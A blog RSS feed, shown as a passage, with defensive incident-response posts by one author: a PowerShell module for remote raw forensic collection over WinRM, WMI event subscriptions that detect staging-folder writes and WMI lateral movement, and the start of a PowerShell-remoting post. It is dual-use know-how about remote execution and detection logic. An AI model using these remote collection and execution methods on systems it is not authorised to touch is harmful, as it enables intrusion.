class=&quot;nx&quot;&gt;user&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; 
&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-all&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Map&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Drive&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-UNC&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;\\&amp;lt;Server&amp;gt;\&amp;lt;folder&amp;gt; /user:&amp;lt;optional share credentials&amp;gt;&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;&lt;br /&gt;
Some of the available configuration options:&lt;/p&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/07parameters1.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;br /&gt;
Some of the switches available in ForensicCopy mode:&lt;/p&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/08parameters2.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;h3 id=&quot;live-response&quot;&gt;Live Response&lt;/h3&gt;
&lt;ul&gt;
  &lt;li&gt;Inspired by the Kansa Framework, LiveResponse mode will execute any Powershell scripts placed inside a content folder.&lt;/li&gt;
  &lt;li&gt;Results consist of the standard out from the executed content, redirected from the collection machine to a local Results folder as ScriptName.txt.&lt;/li&gt;
  &lt;li&gt;The benefit of this method is the ability to operationalise new capability easily by dropping in new content with desired StdOut.&lt;/li&gt;
&lt;/ul&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-powershell&quot; data-lang=&quot;powershell&quot;&gt;&lt;span class=&quot;c&quot;&gt;# Command to run Powersell mode&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;Invoke-LiveResponse&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-ComputerName&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;WinRMtester&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Credential&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;domain&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;user&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-LR&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;  &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Results&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;results&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;e.g&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;C:\Cases&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/09LiveResponse.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;p&gt;Some of the additional switches available in LiveResponse and shell mode:&lt;/p&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/10parameters3.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;h3 id=&quot;performance-tweaks&quot;&gt;Performance Tweaks&lt;/h3&gt;
&lt;p&gt;Testing for Invoke-LiveResponse has primarily been on Windows 7 and 8.1, with some minor testing on Windows 10 and Server Operating systems. I have also tested on Powershell 2.0 to 5.0 target machines. The decision was made to use Powerforensics to enable raw collection and bypass the need to drop or run binaries as much as possible&lt;/p&gt;

&lt;p&gt;Powerforensics is the best Powershell based forensics framework available, but has not been primarily designed for remote raw collections. With that in mind, during testing I discovered an issue in Powerforensics Copy command-lets around memory utilisation and limitation of file size. The limitation is around 2.1GB (Int32 max bytes) and caused by the way Powerforensics builds a byte array for the complete file stream prior to copying. The limitation also means that memory consumption for my use cases (large system files) spiked up to at least the size of the file.&lt;/p&gt;

&lt;p&gt;Normally this would be a game killer for using Powerforensics in this way. However, one of its best features is the ability to use an API and collect data at the appropriate level for your needs. In this case, I was able to leverage the Powerforensics API to collect files of interest in smaller chunks. The public method used is called ForensicDD and I am doing some traditional volume boot record calculations to enable a low memory footprint. File size limitations are also removed as the byte stream size has been significantly reduced.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/11forensicdd.png&quot; width=&quot;500&quot; /&gt;&lt;/div&gt;

&lt;p&gt;Its also worthy to note, the capability to copy alternate data streams besides hard coded special files is not exposed to the user. The ForensicCopy function will simply copy resident bytes or the DATA stream for a normal Raw file copy.&lt;/p&gt;

&lt;p&gt;Another performance tweak was with UsnJournal:$J to limit the collection to non-sparse data. This differs from most forensic collection tools that acquire all $J data and results in a bloated collection including redundant zeros. This method did hit a snag for an edgecase on a 2012R2 server where Powerforensics failed to parse the MFT entry as expected for the UsnJournal. This case is currently under review however I decided to implement a fall back collection via fsutil if required.&lt;/p&gt;

&lt;p&gt;In any case I would recommend tool validation of this collection compared to current tools. In my testing I was able to validate file size and entries with another tool with a similar approach finding sample journal entries as expected.&lt;/p&gt;

&lt;p&gt;Finally, for user experience, I also decided to implement CPU prioritisation to run my collection on idle CPU cycles only.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/12idlecpu.png&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;

&lt;h3 id=&quot;forensic-footprint&quot;&gt;Forensic Footprint&lt;/h3&gt;
&lt;p&gt;The most important factor for forensic footprint should be to know and validate your tools. To respect the order of volatility I have moved Live Response mode to run first to minimise impact by ForensicCopy mode. I would also recommend a naming scheme of Live Response content to further respect order of volatility.&lt;/p&gt;

&lt;p&gt;There has been significant research to optimise target memory performance to be as low as possible. As primarily running in memory, the visible disk footprint of Powershell remoting is relatively small during a PSSession. With default logging, only expected authentication events and very basic WinRM and Powershell logs are generated. Wsmprovhost.exe is spawned on the target machine when running Invoke-LiveResponse and target disk activity is minimised with a remote share transfer. Depending on the collection, Net.exe and any other binaries called in script content may also be spawned from wsmprovhost.exe for their relevant functions.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/13Process.png&quot; alt=&quot; &quot; /&gt;&lt;/p&gt;

&lt;p&gt;During the collection we see the expected authentication IDs 4624 and 4672 to access the target machine. When in ForensicCopy mode, if enabled we also see Event ID 4648 - explicit logon resulting from the collection copy to remote share.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/14_4648.png&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;

&lt;p&gt;In Powershell 5+ environments the capability to enable Powershell scriptblock logging highlights the benefit of visibility with Event ID 4104. Over multiple events we can see the Powerforensics functions being pushed to the target machine, decompressed and loaded to memory with the Add-PowerForensicsType function. We can also see the script block itself in the log. For a complete version, I have included a copy of the raw transaction logs &lt;a href=&quot;https://github.com/mgreen27/mgreen27.github.io/tree/master/other/Invoke-LiveResponse/Powershell%20Transcript&quot;&gt;here&lt;/a&gt; for review.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/15_4104.png&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;

&lt;p&gt;Finally Event ID 4103 – Module logging records pipeline execution details as seen in the example below. Module logging has been available since Powershell 3+ and although not as verbose as 4104, collected context about the commands run inside my script block. Below you can see datastream preparation for an $MFT raw copy. Host application as “wsmprovhost.exe -Embedding” indicates a PSSession generated event.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-01-14-Invoke-LiveResponse/16_4103.png&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;

&lt;h3 id=&quot;future-development-ideas&quot;&gt;Future development ideas&lt;/h3&gt;
&lt;p&gt;Invoke-LiveResponse has currently been limited scope. Some ideas for additional features are:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Add memory collection capability to ForensicCopy mode for less reliance on LiveResponse scripts (and make appropriate order of volatility changes).&lt;/li&gt;
  &lt;li&gt;Expand scope to enable more scale through Powershell Start-Job capabilities.&lt;/li&gt;
  &lt;li&gt;Larger artefact coverage in ForensicCopy mode.&lt;/li&gt;
  &lt;li&gt;Automate analysis tasks.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;conclusion&quot;&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;In this post I have walked through Invoke-LiveResponse, a Powershell module that enables raw file collections and live response over WinRM. Work still needs to be done on scale optimisations, however it provides a viable option of raw collection when other tools fail.&lt;/p&gt;

&lt;p&gt;This kind of capability highlights where I believe Microsoft focused shops will be heading in the future. Although a political nightmare to setup in large environments, the Microsoft mantra of constrained endpoints, just in time administration and transparency in Powershell logging really assists opening up capability whilst minimising risk of remote administration.&lt;/p&gt;

&lt;p&gt;Overall it has been a great learning experience putting together, and optimising some of the Powershell features. Im hoping others can benefit from this post as much as I have enjoyed the research and writing it. Feel free to reach out if you have any questions, find any bugs or pull requests.&lt;/p&gt;

&lt;h3 id=&quot;references&quot;&gt;References&lt;/h3&gt;
&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;Atkinson, Jared. &lt;a href=&quot;http://www.invoke-ir.com/&quot;&gt;Invoke-IR / Powerforensics&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Australian Signals Directorate. &lt;a href=&quot;http://www.asd.gov.au/publications/protect/Securing_PowerShell.pdf&quot;&gt;Securing PowerShell in the Enterprise&lt;/a&gt;, 2016&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Dunwoody, Matthew. &lt;a href=&quot;https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.htm&quot;&gt;Greater Visibility Through PowerShell Logging&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Forensics wiki. &lt;a href=&quot;http://www.forensicswiki.org/wiki/New_Technology_File_System_NTFS&quot;&gt;New Technology File Systems (general NTFS information)&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Green, Matthew. &lt;a href=&quot;https://www.linkedin.com/pulse/powershell-remoting-incident-response-matthew-green/&quot;&gt;Powershell Remoting and Incident Response (WinRM lab setup)&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Invoke-LiveResponse &lt;a href=&quot;https://github.com/mgreen27/Powershell-IR&quot;&gt;https://github.com/mgreen27/Powershell-IR&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Sayer, Matthew. &lt;a href=&quot;http://www.hecfblog.com/2017/05/contents-in-sparse-mirror-may-be.html&quot;&gt;Contents in sparse mirror may be smaller than they appear&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;

</description>
        <pubDate>Sun, 14 Jan 2018 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2018/01/14/Invoke-LiveResponse.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2018/01/14/Invoke-LiveResponse.html</guid>
        
        <category>DFIR</category>
        
        <category>Powershell</category>
        
        <category>LiveResponse</category>
        
        <category>IR</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>Blue Team Hacks - WMI Eventing</title>
        <description>&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2017-04-03-WMI/00Title.jpg&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;h2 id=&quot;blue-team-hacks---wmi-eventing&quot;&gt;Blue Team Hacks - WMI Eventing&lt;/h2&gt;
&lt;p&gt;In this post I am going to cover a little Windows Management Instrumentation (WMI), and in particular an interesting use case for potential use in older environments with Process Monitoring gaps. Thinking about this gap led to me looking at WMI starting as an alternate near real time detection fix, and during feature investigation ended with another technically novel solution I thought was interesting enough to share.&lt;/p&gt;

&lt;h1 id=&quot;the-problem&quot;&gt;The problem&lt;/h1&gt;
&lt;p&gt;I recently worked an engagement where our Process Monitoring tool of choice utilised Microsoft Sysmon. Unfortunately Sysmon only supports Windows 2008R2 and above, presenting with an interesting visibility gap for older machines. The first question was, how can I provide some advanced capability without needing to install another agent?&lt;/p&gt;

&lt;p&gt;Another interesting question is what if as a defender I would like to run an automated action directly on the endpoint if certain conditions exist? A use case of file recovery to mitigate a potential threat actor over a short timeframe dropping a few files, running the tools and collecting output, then removing artefacts from disk with little chance of deleted file recovery. In this instance developing a solution that could also enable an alert, then copy, of files soon after they hit a staging folder could increase recoverability.&lt;/p&gt;

&lt;h1 id=&quot;so-what-is-wmi&quot;&gt;So what is WMI?&lt;/h1&gt;
&lt;p&gt;Windows Management Instrumentation is a framework used to manage Windows Systems and has been an important part of all Windows operating systems since Windows Millennium Edition. The WMI schema is Microsoft’s implementation of the Common Information Model (CIM) and Web-Based Enterprise Management (WBEM) standards by the Distributed Management Taskforce. The purpose of WMI is to enable a standardisation in the way environment classes are modelled, representing the environment data that can be accessed in a common way.&lt;/p&gt;

&lt;p&gt;In layman terms, WMI both describes and is part of the “guts” of Windows internals. WMI can collect informative things like current state, or performance statistics but also capability to query, configure and take actions. WMI is often invoked through various scripting languages like PowerShell or VBScript, with both IT Operations and Offensive types using various WMI capabilities for many years. Some of the more interesting offensive use cases are persistence, reconnoissance, lateral movement, hidden storage and even command &amp;amp; control.&lt;/p&gt;

&lt;p&gt;Unfortunately WMI is minimally documented beyond MSDN and technical code references, all of which will not be covered in this post. For those interested I have included some relevant links in my references section below for further research.&lt;/p&gt;

&lt;h1 id=&quot;wmi-eventing&quot;&gt;WMI Eventing&lt;/h1&gt;
&lt;p&gt;A WMI event subscription is a method of subscribing to certain system events. WMI eventing can be used to action on almost any operating system event. For example - logon, process, registry or file activity. In my use case I am particularly interested in files being created in known staging locations on the endpoint or a particular method of lateral movement that leveraged WMI process creation. I would also require a relevant action of alert, event log generation and for the staging locations, file copy to a different folder.&lt;/p&gt;

&lt;p&gt;WMI Eventing comes in two flavours, a local single process context or permanent WMI Event Subscriptions which are our focus today. These permanent subscriptions are stored in the WMI repository and persist across system shutdown / reboots. It is also worthy to note permanent WMI events run as SYSTEM level privileges.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2017-04-03-WMI/01WMIOverview.png&quot; alt=&quot; &quot; /&gt;&lt;/p&gt;

&lt;p&gt;There are 3 components in WMI Eventing:&lt;/p&gt;

&lt;h4 id=&quot;1-an-event-filter&quot;&gt;&lt;strong&gt;1. An Event Filter&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;An Event Filter is a WQL query that outlines the event of interest. Think of this as the “signature” component of which are two types covering almost all conceivable operating system events.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;Intrinsic events&lt;/strong&gt; are polled events that fire upon a polling interval. In research there was some concern around best practice for performance of polling intervals, in my testing I found no large performance hits however would recommend at least 30 seconds as standard, especially when deploying many Intrinsic event filters.
In my use case I used a a WQL query that polls every 30 seconds to report on all file creations in relevant staging location. For example: C:\Windows\VSS.&lt;/li&gt;
&lt;/ul&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-sql&quot; data-lang=&quot;sql&quot;&gt;	&lt;span class=&quot;k&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;__InstanceCreationEvent&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;WITHIN&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;30&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;WHERE&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;TargetInstance&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;ISA&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;&quot;CIM_DataFile&quot;&lt;/span&gt; 
	&lt;span class=&quot;k&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;TargetInstance&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;Drive&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;&quot;C:&quot;&lt;/span&gt; 
	&lt;span class=&quot;k&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;TargetInstance&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;Path&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\\&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;Windows&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\\&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;VSS&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\\&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;” &lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;ul&gt;
  &lt;li&gt;Alternatively, &lt;strong&gt;Extrinsic events&lt;/strong&gt; are real time filters. The downside is there are not a lot of Extrinsic events available, but they should take preference over Intrinsic.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Below will alert on WMI Process Create event and trigger on some WMI based lateral movement.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-sql&quot; data-lang=&quot;sql&quot;&gt;	&lt;span class=&quot;k&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;MSFT_WmiProvider_ExecMethodAsyncEvent_Pre&lt;/span&gt; 
	&lt;span class=&quot;k&quot;&gt;WHERE&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;ObjectPath&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;&quot;Win32_Process&quot;&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;MethodName&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;&quot;Create&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;h4 id=&quot;2-event-consumer&quot;&gt;&lt;strong&gt;2. Event Consumer&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;An Event Consumer is an action to perform upon triggering an event. There are 5 possible classes.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;ActiveScriptEventConsumer&lt;/strong&gt; - Executes a script by reference or embedded in the consumer itself, support for VBScript via WSH.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;CommandLineEventConsumer&lt;/strong&gt;  - Executes a specified binary or command line, preferred for PowerShell execution, potential for use with an encoded command for embedded PowerShell.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;LogFileEventConsumer&lt;/strong&gt; - Write to a specified log file.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;NTEventLogEventConsumer&lt;/strong&gt; - Logs a Message to the Application EventLog&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;SMTPEventConsumer&lt;/strong&gt; - Sends an email message using SMTP every time that an event is delivered to it.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I initially was looking at NTEventLogEventConsumer which could be the preferred option for most organisations looking for a monitoring capability. For my use case above, I ended up implementing an ActiveScriptEventConsumer that wrote to a particular log file and completed the file copy in a single Event Consumer to a friendly folder. The alerts and file copy status for each machine is managed and retrieved by a centralised dashboard, however the solution could alert, post, or write to any scriptable resource.&lt;/p&gt;

&lt;h4 id=&quot;3-filter-to-consumer-binding&quot;&gt;&lt;strong&gt;3. Filter to Consumer Binding&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Filter to consumer Binding is the registration mechanism that binds a filter to a consumer.&lt;/p&gt;

&lt;h1 id=&quot;final-thoughts&quot;&gt;Final Thoughts&lt;/h1&gt;
&lt;p&gt;With WMI we have a powerful but difficult to manage capability that can be used in some interesting technical use cases. The scope of capabilities being limited to understanding WMI classes and taking the time to build filters and event consumers.&lt;/p&gt;

&lt;p&gt;Its worthy to note there is a proof of concept capability currently available from the research community. FLARE WMI-IDS and Invoke-IR Uproot-IDS (see references) provides a good starting point for those looking to build their own solution.&lt;/p&gt;

&lt;p&gt;One of the major difficulties with WMI Eventing is troubleshooting problems with event consumers. With this in mind I found best workflow came with using some reference code to develop a simple template to assist understanding and troubleshooting efforts then expand into using the above frameworks as new functionality not incorporated is validated and understood.&lt;/p&gt;

&lt;p&gt;For those interested, I have also included a reference PowerShell script on GitHub - &lt;a href=&quot;https://gist.github.com/mgreen27/ef726db0baac5623dc7f76bfa0fc494c?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3B9G70WaahSY2Z0vfHlD4oXg%3D%3D&quot;&gt;HERE&lt;/a&gt; -  to help anyone looking to create a similar ActiveScriptEventConsumer described above.&lt;/p&gt;

&lt;p&gt;Hopefully this post has provided some good food for thought and pointed interested parties in the direction for further research and reference material. Feel free to reach out if you have any questions.&lt;/p&gt;

&lt;h3 id=&quot;references&quot;&gt;References:&lt;/h3&gt;
&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;Ballenthin,William. Graeber, Matt. Teodorescu Claudiu. &lt;a href=&quot;https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3B9G70WaahSY2Z0vfHlD4oXg%3D%3D&quot;&gt;Windows Management Instrumentation (WMI) Offense, Defense, and Forensics&lt;/a&gt;, 2015&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Distributed Management Task Force, &lt;a href=&quot;http://www.dmtf.org/standards/cim?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3B9G70WaahSY2Z0vfHlD4oXg%3D%3D&quot;&gt;Common Information Model&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Distributed Management Task Force, &lt;a href=&quot;http://www.dmtf.org/standards/wbem?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3B9G70WaahSY2Z0vfHlD4oXg%3D%3D&quot;&gt;Web-Based Enterprise Management&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Fireeye FLARE. &lt;a href=&quot;https://github.com/fireeye/flare-wmi/tree/master/WMI-IDS?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3B9G70WaahSY2Z0vfHlD4oXg%3D%3D&quot;&gt;WMI-IDS&lt;/a&gt;, 2015&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Invoke IR. &lt;a href=&quot;https://github.com/Invoke-IR/Uproot?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3B9G70WaahSY2Z0vfHlD4oXg%3D%3D&quot;&gt;Uproot&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Kerr, &lt;a href=&quot;https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3B9G70WaahSY2Z0vfHlD4oXg%3D%3D&quot;&gt;Devon.There’s Something About WMI&lt;/a&gt;, 2015&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;MSDN. &lt;a href=&quot;https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3B9G70WaahSY2Z0vfHlD4oXg%3D%3D&quot;&gt;Windows Management Instrumentation&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Parisi, Timothy. Pena, Evan. &lt;a href=&quot;https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3B9G70WaahSY2Z0vfHlD4oXg%3D%3D&quot;&gt;WMI vs. WMI: Monitoring for Malicious Activity&lt;/a&gt;, 2016&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;US Department of Homeland Security. &lt;a href=&quot;https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3B9G70WaahSY2Z0vfHlD4oXg%3D%3D&quot;&gt;WMI for Detection and Response&lt;/a&gt;, 2016&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;
</description>
        <pubDate>Mon, 03 Apr 2017 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2017/04/03/Blue_Team_Hacks-WMI_Eventing.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2017/04/03/Blue_Team_Hacks-WMI_Eventing.html</guid>
        
        <category>DFIR</category>
        
        <category>Powershell</category>
        
        <category>WMI</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>PowerShell Remoting and Incident Response</title>
        <description>&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2017-01-12-PowerShell_Remoting_IR/00PowerShellthumb.png&quot; alt=&quot; &quot; /&gt;&lt;/p&gt;
&lt;h2 id=&quot;powershell-remoting-and-incident-response&quot;&gt;PowerShell Remoting and Incident Response&lt;/h2&gt;
&lt;p&gt;PowerShell is quickly becoming a tool of choice for many IT Operations staff and Security Practitioners alike. This post is a quick overview of using Windows Remote Management and PowerShell for Incident Response. I will also provide some proof of concept setup instructions and general themes for those interested in further research on this topic.&lt;/p&gt;

&lt;h3 id=&quot;so-what-is-windows-remote-management&quot;&gt;So what is Windows Remote Management?&lt;/h3&gt;
&lt;p&gt;PowerShell is a powerful scripting language for systems management due to its ability to run on remote systems, automation capability and ability to scale. The component enabling this capability is called the Windows Remote Management service (WinRM), which works over a standardised Simple Object Access Protocol (SOAP) based, firewall friendly protocol – WS Management. PowerShell is just one consumer of this service/protocol combo and with all Windows management communications heading down this path, this capability is only going to be further entrenched moving forward.&lt;/p&gt;

&lt;p&gt;Windows Remote Management has been available since PowerShell 2.0 and Windows 7 through to the most recent incarnation in Windows Management Framework (WMF) 5.1. WinRM is enabled by default in Windows Server 2012 and 2016 but, as you’ll see below, simple to enable back to Windows 7 running PowerShell 2.0.&lt;/p&gt;

&lt;h3 id=&quot;why-do-i-care&quot;&gt;Why do I care?&lt;/h3&gt;
&lt;p&gt;There are six primary reasons why you should care about PowerShell Remoting for Incident Response:&lt;/p&gt;

